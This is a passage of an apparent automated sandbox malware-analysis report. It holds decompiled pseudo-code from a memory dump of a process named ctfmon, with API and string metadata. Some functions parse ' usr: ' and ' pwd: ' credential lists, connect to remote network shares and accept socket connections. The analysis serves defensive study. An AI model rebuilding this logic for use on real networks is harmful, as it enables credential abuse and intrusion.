                                                							} else {
                                                								goto L6;
                                                							}
                                                						}
                                                						E00977848(_t21);
                                                						_t5 = _t17;
                                                					} else {
                                                						SetLastError(_t16);
                                                						_t5 = _t20;
                                                					}
                                                					return _t5;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00973613,009729D1,0098DD18,00000010,0097219C,?,?,?,?,?,00000000,?), ref: 0097362A
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00973638
                                                • SetLastError.KERNEL32(00000000,00000000,?), ref: 00973645
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: f1f2d42d38c10dcf0c782fb280ba526f23d077fdf8e154bde4e811a459fee3d4
                                                • Instruction ID: cb8dd7b62cc5821b7716960c8744a1b5eb4e3f18f3ba0b28a237b48d534d24fb
                                                • Opcode Fuzzy Hash: f1f2d42d38c10dcf0c782fb280ba526f23d077fdf8e154bde4e811a459fee3d4
                                                • Instruction Fuzzy Hash: 4FF0C83B91D6207BC6211739BC0AA6B2764EBD6B32B22C529F61CDA3E0DF544D01B3D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E009694A0(void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int _a4) {
                                                				signed int _v8;
                                                				char _v258;
                                                				char _v264;
                                                				char _v520;
                                                				intOrPtr _v524;
                                                				intOrPtr _v528;
                                                				intOrPtr _v532;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t60;
                                                				void* _t67;
                                                				intOrPtr _t69;
                                                				void* _t74;
                                                				intOrPtr _t77;
                                                				intOrPtr _t82;
                                                				signed int _t84;
                                                				void* _t88;
                                                				intOrPtr _t90;
                                                				signed int _t91;
                                                				intOrPtr _t93;
                                                				void* _t95;
                                                				intOrPtr _t97;
                                                				void* _t98;
                                                				signed int _t101;
                                                				intOrPtr* _t105;
                                                				intOrPtr* _t106;
                                                				signed int _t107;
                                                				char _t108;
                                                				void* _t110;
                                                				void* _t111;
                                                				intOrPtr* _t112;
                                                				intOrPtr* _t114;
                                                				signed int _t117;
                                                				intOrPtr _t118;
                                                				signed int _t120;
                                                				void* _t121;
                                                				signed int _t122;
                                                				signed int _t124;
                                                				signed int _t125;
                                                				void* _t127;
                                                				signed int _t128;
                                                				void* _t129;
                                                				void* _t130;
                                                				void* _t131;
                                                				void* _t133;
                                                				void* _t134;
                                                
                                                				_t102 = __ecx;
                                                				_t60 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t60 ^ _t128;
                                                				_t101 = _a4;
                                                				_t117 = __edx;
                                                				_t118 = E00975E17(__ecx, "r");
                                                				_t130 = _t129 + 8;
                                                				_v524 = _t118;
                                                				_t135 = _t118;
                                                				if(_t118 == 0) {
                                                					L37:
                                                					return E00970A5D(_v8 ^ _t128, _t118);
                                                				}
                                                				E00973440(__edx,  &_v264, 0, 0x100);
                                                				_t67 = E00975FE9(_t135,  &_v264, 0x100, _t118);
                                                				_t131 = _t130 + 0x18;
                                                				if(_t67 == 0) {
                                                					L36:
                                                					_push(_t118);
                                                					E00975EA4(_t102, _t152);
                                                					goto L37;
                                                				} else {
                                                					do {
                                                						_t105 =  &_v264;
                                                						_t110 = _t105 + 1;
                                                						do {
                                                							_t69 =  *_t105;
                                                							_t105 = _t105 + 1;
                                                						} while (_t69 != 0);
                                                						_t102 = _t105 - _t110;
                                                						if(_t102 > 0x80 || _t102 < 6) {
                                                							L35:
                                                							_t118 = _v524;
                                                							goto L36;
                                                						} else {
                                                							E009776F4( &_v264, " usr: ", 6);
                                                							_t120 =  ==  ? 1 : 0;
                                                							_t74 = E009776F4( &_v264, " pwd: ", 6);
                                                							_t131 = _t131 + 0x18;
                                                							if(_t74 != 0) {
                                                								__eflags = _t120;
                                                								if(__eflags == 0) {
                                                									goto L35;
                                                								}
                                                								L10:
                                                								E00973440(_t117,  &_v520, 0, 0x100);
                                                								_t106 =  &_v264;
                                                								_t133 = _t131 + 0xc;
                                                								_t111 = _t106 + 1;
                                                								do {
                                                									_t77 =  *_t106;
                                                									_t106 = _t106 + 1;
                                                								} while (_t77 != 0);
                                                								_t102 = _t106 - _t111;
                                                								E00983DB0( &_v520,  &_v258, _t106 - _t111 - 7);
                                                								_t134 = _t133 + 0xc;
                                                								_t121 = _t120 - 1;
                                                								if(_t121 == 0) {
                                                									_t122 = 0;
                                                									__eflags =  *(_t117 + 0x20);
                                                									if(__eflags <= 0) {
                                                										L29:
                                                										_t82 = E00970A6E(_t122, __eflags, 0x100);
                                                										_t112 =  &_v520;
                                                										_v532 = _t82;
                                                										_t134 = _t134 + 4;
                                                										_t124 = _t82 - _t112;
                                                										__eflags = _t124;
                                                										do {
                                                											_t107 =  *_t112;
                                                											_t112 = _t112 + 1;
                                                											 *((char*)(_t124 + _t112 - 1)) = _t107;
                                                											__eflags = _t107;
                                                										} while (_t107 != 0);
                                                										_t102 = _t117;
                                                										_t84 = E00966F70(_t117);
                                                										__eflags = _t84;
                                                										if(_t84 != 0) {
                                                											_t102 =  *(_t117 + 0x20);
                                                											 *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) +  *(_t117 + 0x20) * 4)) = _v532;
                                                											_t53 = _t117 + 0x20;
                                                											 *_t53 =  *(_t117 + 0x20) + 1;
                                                											__eflags =  *_t53;
                                                										}
                                                										goto L33;
                                                									} else {
                                                										goto L25;
                                                									}
                                                									while(1) {
                                                										L25:
                                                										_t90 = 0;
                                                										__eflags = _t122 -  *(_t117 + 0x20);
                                                										if(_t122 <  *(_t117 + 0x20)) {
                                                											_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) + _t122 * 4));
                                                										}
                                                										_t102 =  &_v520;
                                                										_t91 = E00977612(_t117, _t122, _t90,  &_v520);
                                                										_t134 = _t134 + 8;
                                                										__eflags = _t91;
                                                										if(_t91 == 0) {
                                                											goto L33;
                                                										}
                                                										_t122 = _t122 + 1;
                                                										__eflags = _t122 -  *(_t117 + 0x20);
                                                										if(__eflags < 0) {
                                                											continue;
                                                										}
                                                										goto L29;
                                                									}
                                                									goto L33;
                                                								}
                                                								_t125 = _t121 - 1;
                                                								if(_t125 != 0) {
                                                									goto L33;
                                                								}
                                                								if( *(_t101 + 0x20) <= _t125) {
                                                									L20:
                                                									_t93 = E00970A6E(_t125, _t149, 0x100);
                                                									_t114 =  &_v520;
                                                									_v528 = _t93;
                                                									_t134 = _t134 + 4;
                                                									_t127 = _t93 - _t114;
                                                									asm("o16 nop [eax+eax]");
                                                									do {
                                                										_t108 =  *_t114;
                                                										_t114 = _t114 + 1;
                                                										 *((char*)(_t127 + _t114 - 1)) = _t108;
                                                									} while (_t108 != 0);
                                                									_t102 = _t101;
                                                									_t95 = E00966F70(_t101);
                                                									_t151 = _t95;
                                                									if(_t95 != 0) {
                                                										_t102 =  *(_t101 + 0x20);
                                                										 *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) +  *(_t101 + 0x20) * 4)) = _v528;
                                                										 *(_t101 + 0x20) =  *(_t101 + 0x20) + 1;
                                                									}
                                                									goto L33;
                                                								}
                                                								while(1) {
                                                									_t97 = 0;
                                                									if(_t125 <  *(_t101 + 0x20)) {
                                                										_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) + _t125 * 4));
                                                									}
                                                									_t102 =  &_v520;
                                                									_t98 = E00977612(_t117, _t125, _t97,  &_v520);
                                                									_t134 = _t134 + 8;
                                                									if(_t98 == 0) {
                                                										goto L33;
                                                									}
                                                									_t125 = _t125 + 1;
                                                									_t149 = _t125 -  *(_t101 + 0x20);
                                                									if(_t125 <  *(_t101 + 0x20)) {
                                                										continue;
                                                									}
                                                									goto L20;
                                                								}
                                                								goto L33;
                                                							}
                                                							_t10 = _t74 + 2; // 0x2
                                                							_t120 = _t10;
                                                							goto L10;
                                                						}
                                                						L33:
                                                						E00973440(_t117,  &_v264, 0, 0x100);
                                                						_t118 = _v524;
                                                						_t88 = E00975FE9(_t151,  &_v264, 0x100, _t118);
                                                						_t131 = _t134 + 0x18;
                                                						_t152 = _t88;
                                                					} while (_t88 != 0);
                                                					goto L36;
                                                				}
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: pwd: $ usr: $/LU5/
                                                • API String ID: 0-1805602843
                                                • Opcode ID: fad7d1ef0b1ffbd5f227ff694a3569f4dbb9ff7e43839f427671591ef3961707
                                                • Instruction ID: f810b777022b6950138e769083fedc9e68455684e216f5f2cca87d00083a278d
                                                • Opcode Fuzzy Hash: fad7d1ef0b1ffbd5f227ff694a3569f4dbb9ff7e43839f427671591ef3961707
                                                • Instruction Fuzzy Hash: 3D61C4B29003159BCF25EF60CD85BE9B7BCBF49304F0581A5ED49AB242E671EE45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E00966100(unsigned int __ecx, unsigned int __edx, signed int _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				unsigned int _v24;
                                                				intOrPtr _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t34;
                                                				signed int _t37;
                                                				void* _t40;
                                                				intOrPtr _t42;
                                                				signed int _t44;
                                                				intOrPtr _t45;
                                                				signed int _t50;
                                                				signed int _t54;
                                                				unsigned int _t58;
                                                				signed int _t59;
                                                				signed int _t66;
                                                				signed int _t72;
                                                				signed int _t75;
                                                				signed int _t80;
                                                				intOrPtr _t81;
                                                
                                                				_t68 = __edx;
                                                				_t62 = __ecx;
                                                				_push(0xffffffff);
                                                				_push(E009845D0);
                                                				_push( *[fs:0x0]);
                                                				_t81 = _t80 - 0xc;
                                                				_push(_t58);
                                                				_t34 =  *0x98f008; // 0x35554c2f
                                                				_push(_t34 ^ _t80);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v20 = _t81;
                                                				_t75 = __ecx;
                                                				_v24 = __ecx;
                                                				_t37 = _a4;
                                                				_t72 = _t37 | 0x0000000f;
                                                				if(_t72 <= 0xfffffffe) {
                                                					_t58 =  *(__ecx + 0x14);
                                                					_t62 = _t58 >> 1;
                                                					_t68 = 0xaaaaaaab * _t72 >> 0x20 >> 1;
                                                					__eflags = _t62 - 0xaaaaaaab * _t72 >> 0x20 >> 1;
                                                					if(_t62 > 0xaaaaaaab * _t72 >> 0x20 >> 1) {
                                                						_t72 = _t62 + _t58;
                                                						__eflags = _t58 - 0xfffffffe - _t62;
                                                						if(_t58 > 0xfffffffe - _t62) {
                                                							_t72 = 0xfffffffe;
                                                						}
                                                					}
                                                				} else {
                                                					_t72 = _t37;
                                                				}
                                                				_t11 = _t72 + 1; // 0xffffffff
                                                				_t40 = _t11;
                                                				_v8 = 0;
                                                				if(_t40 != 0) {
                                                					__eflags = _t40 - 0xffffffff;
                                                					if(__eflags > 0) {
                                                						_t40 = E00971283(__eflags);
                                                					}
                                                					__eflags = _t40 - 0x1000;
                                                					if(__eflags < 0) {
                                                						_t59 = E00970A6E(_t75, __eflags, _t40);
                                                						_t81 = _t81 + 4;
                                                						__eflags = _t59;
                                                						if(__eflags != 0) {
                                                							goto L17;
                                                						} else {
                                                							E00975C20(_t59, _t62, _t68, _t72, __eflags);
                                                							_t50 = _a4;
                                                							_a4 = _t50;
                                                							__eflags = _t50 + 1;
                                                							_v20 = _t81;
                                                							_v8 = 2;
                                                							_v28 = E00966440(_t59, _t68, _t72, _t75, _t50 + 1);
                                                							return E009661E5;
                                                						}
                                                					} else {
                                                						_t13 = _t40 + 0x23; // 0x23
                                                						_t67 = _t13;
                                                						__eflags = _t13 - _t40;
                                                						if(__eflags <= 0) {
                                                							E00971283(__eflags);
                                                						}
                                                						_t54 = E00970A6E(_t75, __eflags, _t67);
                                                						_t81 = _t81 + 4;
                                                						__eflags = _t54;
                                                						if(__eflags == 0) {
                                                							_t54 = E00975C20(_t58, _t67, _t68, _t72, __eflags);
                                                						}
                                                						_t14 = _t54 + 0x23; // 0x23
                                                						_t59 = _t14 & 0xffffffe0;
                                                						 *(_t59 - 4) = _t54;
                                                						goto L17;
                                                					}
                                                				} else {
                                                					_t59 = 0;
                                                					L17:
                                                					_t42 = _a8;
                                                					if(_t42 != 0) {
                                                						if( *(_t75 + 0x14) < 0x10) {
                                                							_t66 = _t75;
                                                						} else {
                                                							_t66 =  *_t75;
                                                						}
                                                						if(_t42 != 0) {
                                                							E00983DB0(_t59, _t66, _t42);
                                                						}
                                                					}
                                                					_t43 =  *(_t75 + 0x14);
                                                					if( *(_t75 + 0x14) >= 0x10) {
                                                						E00965CF0(_t59, _t68, _t72,  *_t75, _t43 + 1);
                                                					}
                                                					 *(_t75 + 0x14) = 0xf;
                                                					 *((intOrPtr*)(_t75 + 0x10)) = 0;
                                                					if( *(_t75 + 0x14) < 0x10) {
                                                						_t44 = _t75;
                                                					} else {
                                                						_t44 =  *_t75;
                                                					}
                                                					 *_t44 = 0;
                                                					_t45 = _a8;
                                                					 *_t75 = _t59;
                                                					 *(_t75 + 0x14) = _t72;
                                                					 *((intOrPtr*)(_t75 + 0x10)) = _t45;
                                                					if( *(_t75 + 0x14) >= 0x10) {
                                                						_t75 = _t59;
                                                					}
                                                					 *((char*)(_t75 + _t45)) = 0;
                                                					 *[fs:0x0] = _v16;
                                                					return _t45;
                                                				}
                                                			}

                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0096617F
                                                  • Part of subcall function 00971283: __CxxThrowException@8.LIBVCRUNTIME ref: 0097129A
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00966192
                                                • new.LIBCMT ref: 00966198
                                                • new.LIBCMT ref: 009661B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                • String ID: /LU5/
                                                • API String ID: 3339364867-937868281
                                                • Opcode ID: 44a191321cf522a77e2dc124d8d3b528643bbb5cdda6ea6d270e026885603273
                                                • Instruction ID: 0fa7cb779ef5c5089150892b0024fc0d51622900f1353ad1088d52649dcbf265
                                                • Opcode Fuzzy Hash: 44a191321cf522a77e2dc124d8d3b528643bbb5cdda6ea6d270e026885603273
                                                • Instruction Fuzzy Hash: CD411471A047019FDB24DF68C88171ABBE8EB42710F510A2EE866C7382D775EA44C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E0096B0F0(intOrPtr* __ecx, char* __edx, void* __edi, char* _a4) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v540;
                                                				char* _v560;
                                                				int _v576;
                                                				struct _NETRESOURCE _v580;
                                                				char* _v584;
                                                				char* _v588;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr* _t26;
                                                				char _t42;
                                                				intOrPtr* _t51;
                                                				void* _t56;
                                                				long _t57;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                				signed int _t62;
                                                				signed int _t63;
                                                
                                                				_t62 = (_t60 & 0xfffffff0) - 0x248;
                                                				_t23 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t23 ^ _t62;
                                                				_t51 = __ecx;
                                                				_v584 = _a4;
                                                				_v588 = __edx;
                                                				_t26 = __ecx;
                                                				_t56 =  &_v540 - __ecx;
                                                				do {
                                                					_t42 =  *_t26;
                                                					_t26 = _t26 + 1;
                                                					 *((char*)(_t56 + _t26 - 1)) = _t42;
                                                				} while (_t42 != 0);
                                                				E0096A2B0( &_v540);
                                                				E00963F90( &_v540,  &_v276, "\\\\%s",  &_v540);
                                                				_t63 = _t62 + 0xc;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movaps [esp+0x20], xmm0");
                                                				_v560 =  &_v276;
                                                				asm("movaps [esp+0x18], xmm0");
                                                				_v576 = 0;
                                                				_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
                                                				if(_t57 != 0) {
                                                					if(_t57 != 0x4c3) {
                                                						L6:
                                                						SetLastError(_t57);
                                                						_pop(_t58);
                                                						return E00970A5D(_v8 ^ _t63, _t58);
                                                					} else {
                                                						E0096B1F0(_t51, _t57);
                                                						_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
                                                						if(_t57 == 0) {
                                                							goto L3;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				} else {
                                                					L3:
                                                					_pop(_t59);
                                                					return E00970A5D(_v8 ^ _t63, _t59);
                                                				}
                                                			}

                                                APIs
                                                • WNetAddConnection2A.MPR(?), ref: 0096B180
                                                • SetLastError.KERNEL32(00000000), ref: 0096B1CD
                                                  • Part of subcall function 0096B1F0: WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 0096B24E
                                                • WNetAddConnection2A.MPR(?,?,?,00000000), ref: 0096B1C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Connection2$CancelErrorLast
                                                • String ID: /LU5/$\\%s
                                                • API String ID: 4062109977-2245926631
                                                • Opcode ID: d8111f66b52498950c55e6ae2d26dacf00fbac322f55668a978b715dae2d45b4
                                                • Instruction ID: 1884472f1a48aa1ebf292cf4d23f5539be1f5e71fac5e5eb13cf01e627b2b413
                                                • Opcode Fuzzy Hash: d8111f66b52498950c55e6ae2d26dacf00fbac322f55668a978b715dae2d45b4
                                                • Instruction Fuzzy Hash: 6721B432908345ABC721DF24D815B9FBBE8EFC9310F01462AF99CD7250EB3199488B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • accept.WS2_32(?,?,?), ref: 00968F96
                                                • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 00968FB3
                                                • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000001,00000000,00000000), ref: 00968FE8
                                                • new.LIBCMT ref: 00968FF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Ioctlacceptsetsockopt
                                                • String ID: /LU5/
                                                • API String ID: 4090600942-937868281
                                                • Opcode ID: 7c50c22d149dab4f67f77db5dbaa9b3258a3c4c9e46d0f94192316ad6ec0602a
                                                • Instruction ID: 9c796031c675c1140eb076a8ca90dd956d5facb34971b9245ef2d23b87fc8443
                                                • Opcode Fuzzy Hash: 7c50c22d149dab4f67f77db5dbaa9b3258a3c4c9e46d0f94192316ad6ec0602a
                                                • Instruction Fuzzy Hash: 2B111CB1941208EFEB10DF94DC49FEE7BFCEB08700F100165E915FA280DBB16A489BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E009790F8(void* __ebx, void* __ecx, void* __edx) {
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t20;
                                                				void* _t21;
                                                				void* _t23;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				long _t36;
                                                				long _t37;
                                                				void* _t40;
                                                
                                                				_t29 = __edx;
                                                				_t23 = __ecx;
                                                				_t20 = __ebx;
                                                				_t36 = GetLastError();
                                                				_t2 =  *0x990558; // 0x6
                                                				_t42 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t3 = E009778D0(_t23, 1, 0x364);
                                                					_t31 = _t3;
                                                					_pop(_t25);
                                                					if(_t31 != 0) {
                                                						_t4 = E00977F1D(_t25, __eflags,  *0x990558, _t31);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E00978F6A(_t25, _t31, 0x996690);
                                                							E00977848(0);
                                                							_t40 = _t40 + 0xc;
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t31);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t3);
                                                						L4:
                                                						E00977848();
                                                						_pop(_t25);
                                                						L9:
                                                						SetLastError(_t36);
                                                						E00977805(_t20, _t29, _t31, _t36);
                                                						asm("int3");
                                                						_push(_t20);
                                                						_push(_t36);
                                                						_push(_t31);
                                                						_t37 = GetLastError();
                                                						_t21 = 0;
                                                						_t9 =  *0x990558; // 0x6
                                                						_t45 = _t9 - 0xffffffff;
                                                						if(_t9 == 0xffffffff) {
                                                							L12:
                                                							_t32 = E009778D0(_t25, 1, 0x364);
                                                							_pop(_t27);
                                                							if(_t32 != 0) {
                                                								_t11 = E00977F1D(_t27, __eflags,  *0x990558, _t32);
                                                								__eflags = _t11;
                                                								if(_t11 != 0) {
                                                									E00978F6A(_t27, _t32, 0x996690);
                                                									E00977848(_t21);
                                                									__eflags = _t32;
                                                									if(_t32 != 0) {
                                                										goto L19;
                                                									} else {
                                                										goto L18;
                                                									}
                                                								} else {
                                                									_push(_t32);
                                                									goto L14;
                                                								}
                                                							} else {
                                                								_push(_t21);
                                                								L14:
                                                								E00977848();
                                                								L18:
                                                								SetLastError(_t37);
                                                							}
                                                						} else {
                                                							_t32 = E00977EC7(_t25, _t45, _t9);
                                                							if(_t32 != 0) {
                                                								L19:
                                                								SetLastError(_t37);
                                                								_t21 = _t32;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						}
                                                						return _t21;
                                                					}
                                                				} else {
                                                					_t31 = E00977EC7(_t23, _t42, _t2);
                                                					if(_t31 != 0) {
                                                						L8:
                                                						SetLastError(_t36);
                                                						return _t31;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • GetLastError.KERNEL32(123,?,009749AE,?,123,?,00977670,00990E80,123,?,73B76490,123,?,77109EB0), ref: 009790FC
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 00979164
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 00979170
                                                • _abort.LIBCMT ref: 00979176
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_abort
                                                • String ID: 123
                                                • API String ID: 88804580-2286445522
                                                • Opcode ID: c099750025ba6114ecaf0f9767feda0a97f26cd25335ec29c51f1488711d1bd9
                                                • Instruction ID: e8fba914e7d0b04d8a3b3f9222ac2cff0995b7fdd2948ce5966803985b0df3db
                                                • Opcode Fuzzy Hash: c099750025ba6114ecaf0f9767feda0a97f26cd25335ec29c51f1488711d1bd9
                                                • Instruction Fuzzy Hash: FCF0283764C60266C2023778AC0EF6B262DDFD2776F228024F41CD6291EE648C119262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E0097D7BD(void* __ebx, void* __edi, signed int _a4, void* _a8, signed int _a12) {
                                                				signed int _v8;
                                                				long _v12;
                                                				struct _OVERLAPPED* _v16;
                                                				long _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				intOrPtr _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				void* _v52;
                                                				void* __esi;
                                                				signed int _t62;
                                                				intOrPtr _t66;
                                                				signed char _t68;
                                                				signed int _t69;
                                                				signed int _t71;
                                                				signed int _t73;
                                                				signed int _t74;
                                                				signed int _t77;
                                                				intOrPtr _t79;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				signed int _t90;
                                                				signed int _t106;
                                                				signed int _t107;
                                                				signed int _t110;
                                                				intOrPtr _t112;
                                                				signed int _t117;
                                                				signed int _t119;
                                                				void* _t121;
                                                				signed int _t123;
                                                				signed int _t124;
                                                				void* _t125;
                                                
                                                				_t62 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t62 ^ _t124;
                                                				_t110 = _a12;
                                                				_v12 = _t110;
                                                				_t123 = _a4;
                                                				_t121 = _a8;
                                                				_v52 = _t121;
                                                				if(_t110 != 0) {
                                                					__eflags = _t121;
                                                					if(_t121 != 0) {
                                                						_push(__ebx);
                                                						_t106 = _t123 >> 6;
                                                						_t119 = (_t123 & 0x0000003f) * 0x30;
                                                						_v32 = _t106;
                                                						_t66 =  *((intOrPtr*)(0x996480 + _t106 * 4));
                                                						_v48 = _t66;
                                                						_v28 = _t119;
                                                						_t13 = _t119 + 0x29; // 0x8a10000
                                                						_t107 =  *((intOrPtr*)(_t66 + _t13));
                                                						__eflags = _t107 - 2;
                                                						if(_t107 == 2) {
                                                							L6:
                                                							_t68 =  !_t110;
                                                							__eflags = _t68 & 0x00000001;
                                                							if((_t68 & 0x00000001) != 0) {
                                                								_t66 = _v48;
                                                								L9:
                                                								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
                                                								if(__eflags != 0) {
                                                									E009809B4(_t123, 0, 0, 2);
                                                									_t125 = _t125 + 0x10;
                                                								}
                                                								_t69 = E0097D362(_t107, _t119, __eflags, _t123);
                                                								__eflags = _t69;
                                                								if(_t69 == 0) {
                                                									_t112 =  *((intOrPtr*)(0x996480 + _v32 * 4));
                                                									_t71 = _v28;
                                                									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
                                                									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
                                                										_t40 = _t71 + 0x18; // 0xcccccccc
                                                										_v24 = 0;
                                                										_v20 = 0;
                                                										_v16 = 0;
                                                										_t73 = WriteFile( *(_t112 + _t40), _t121, _v12,  &_v20, 0);
                                                										__eflags = _t73;
                                                										if(_t73 == 0) {
                                                											_v24 = GetLastError();
                                                										}
                                                										_t123 =  &_v24;
                                                										goto L28;
                                                									}
                                                									_t87 = _t107;
                                                									__eflags = _t87;
                                                									if(_t87 == 0) {
                                                										_t89 = E0097D3D8(_t107, _t121,  &_v24, _t123, _t121, _v12);
                                                										goto L17;
                                                									}
                                                									_t90 = _t87 - 1;
                                                									__eflags = _t90;
                                                									if(_t90 == 0) {
                                                										_t89 = E0097D5A5(_t107, _t121,  &_v24, _t123, _t121, _v12);
                                                										goto L17;
                                                									}
                                                									__eflags = _t90 != 1;
                                                									if(_t90 != 1) {
                                                										goto L34;
                                                									}
                                                									_t89 = E0097D4B7(_t107, _t121,  &_v24, _t123, _t121, _v12);
                                                									goto L17;
                                                								} else {
                                                									__eflags = _t107;
                                                									if(_t107 == 0) {
                                                										_t89 = E0097D142(_t107, _t121,  &_v24, _t123, _t121, _v12);
                                                										L17:
                                                										L15:
                                                										_t123 = _t89;
                                                										L28:
                                                										asm("movsd");
                                                										asm("movsd");
                                                										asm("movsd");
                                                										_t74 = _v40;
                                                										__eflags = _t74;
                                                										if(_t74 != 0) {
                                                											__eflags = _t74 - _v36;
                                                											L40:
                                                											L41:
                                                											return E00970A5D(_v8 ^ _t124, _t123);
                                                										}
                                                										_t77 = _v44;
                                                										__eflags = _t77;
                                                										if(_t77 == 0) {
                                                											_t121 = _v52;
                                                											L34:
                                                											_t117 = _v28;
                                                											_t79 =  *((intOrPtr*)(0x996480 + _v32 * 4));
                                                											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
                                                											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
                                                												L37:
                                                												 *((intOrPtr*)(E00975D43())) = 0x1c;
                                                												_t81 = E00975D30();
                                                												 *_t81 =  *_t81 & 0x00000000;
                                                												__eflags =  *_t81;
                                                												L38:
                                                												goto L40;
                                                											}
                                                											__eflags =  *_t121 - 0x1a;
                                                											if( *_t121 != 0x1a) {
                                                												goto L37;
                                                											}
                                                											goto L40;
                                                										}
                                                										_t123 = 5;
                                                										__eflags = _t77 - _t123;
                                                										if(_t77 != _t123) {
                                                											_t81 = E00975D0D(_t77);
                                                										} else {
                                                											 *((intOrPtr*)(E00975D43())) = 9;
                                                											 *(E00975D30()) = _t123;
                                                										}
                                                										goto L38;
                                                									}
                                                									__eflags = _t107 - 1 - 1;
                                                									if(_t107 - 1 > 1) {
                                                										goto L34;
                                                									}
                                                									_t89 = E0097D2F5( &_v24, _t121, _v12);
                                                									goto L15;
                                                								}
                                                							}
                                                							 *(E00975D30()) =  *_t97 & 0x00000000;
                                                							 *((intOrPtr*)(E00975D43())) = 0x16;
                                                							_t81 = E00975C10();
